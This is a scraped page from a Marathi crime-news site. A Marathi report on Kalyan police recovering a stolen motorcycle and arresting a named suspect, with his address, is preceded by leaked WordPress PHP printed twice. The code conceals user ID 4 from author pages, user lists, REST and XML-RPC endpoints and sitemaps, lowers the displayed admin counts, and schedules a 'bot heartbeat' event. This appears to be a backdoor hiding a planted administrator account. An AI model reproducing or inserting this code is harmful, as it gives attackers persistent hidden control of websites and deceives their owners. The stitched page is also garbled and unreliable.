add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 4;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 4;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 4;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 4;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
कोळसेवाडी पोलिसांची दमदार कामगिरी : चोरीची मोटारसायकल अवघ्या काही दिवसांत हस्तगत, आरोपी अटकेत - crimeaala.com
दि २७ कल्याण :कोळसेवाडी पोलीस ठाणे हद्दीतून चोरीस गेलेली हिरो कंपनीची एक्सट्रीम १२५ आर मोटारसायकल अवघ्या काही दिवसांत शोधून काढत पोलिसांनी आरोपीला अटक केली असून, सुमारे ५५ हजार रुपये किमतीची मोटारसायकल हस्तगत करण्यात आली आहे. या कारवाईमुळे वाहनचोरीच्या घटनांना आळा बसण्यास मदत होणार आहे.
दि २१ डिसेंबर २०२५ रोजी सायंकाळी ५.३० ते २३ डिसेंबर २०२५ रोजी दुपारी १२.३० या कालावधीत, आर.डी. बार, शिळफाटा रोड, कल्याण पूर्व येथील पार्किंगमधून एम.एच.-०५-एफ.एन.-१०४३ क्रमांकाची एक्सट्रीम १२५ आर मोटारसायकल अज्ञात चोरट्याने चोरून नेली होती. याप्रकरणी फिर्यादीच्या तक्रारीवरून कोळसेवाडी पोलीस ठाण्यात गु.रजि. नं. ९१४/२०२६, भा.न्या.सं. २०२३ चे कलम ३०३(२) अन्वये गुन्हा दाखल करण्यात आला होता.
गुन्ह्याच्या तपासादरम्यान घटनास्थळी मिळालेल्या सीसीटीव्ही फुटेज आणि गोपनीय माहितीच्या आधारे पोलिसांनी आरोपीची ओळख पटवली. त्यानुसार धनेश्वर नारायण महतो (वय ३०), रा. भराडी आई बिल्डिंग, रूम नं. २१६, जिमखाना रोड, आजदे गाव, डोंबिवली पूर्व यास अटक करण्यात आली. आरोपीकडून चोरीस गेलेली एक्सट्रीम मोटारसायकल (एम.एच.-०५-एफ.एन.-१०४३) हस्तगत करण्यात आली आहे.
ही कारवाई पोलीस उप आयुक्त (परिमंडळ-३, कल्याण) अतुल झेंडे व सहाय्यक पोलीस आयुक्त (कल्याण विभाग) कल्याणजी घेटे यांच्या मार्गदर्शनाखाली, कोळसेवाडी पोलीस ठाण्याचे पोलीस निरीक्षक गणेश न्हायदे यांच्या सूचनेनुसार करण्यात आली. गुन्हे प्रकटीकरण पथकातील सहाय्यक पोलीस निरीक्षक संदिप भालेराव, पो.हवा. ५०३ विशाल वाघ, पो.हवा. ६९३० गोरखनाथ घुगे, पो.हवा. २२८३ सचिन आव्हाड, पोना. ४५७ दिलीप कोती आणि पोशि. ३६०१ राहुल खरे यांच्या पथकाने ही यशस्वी कारवाई केली.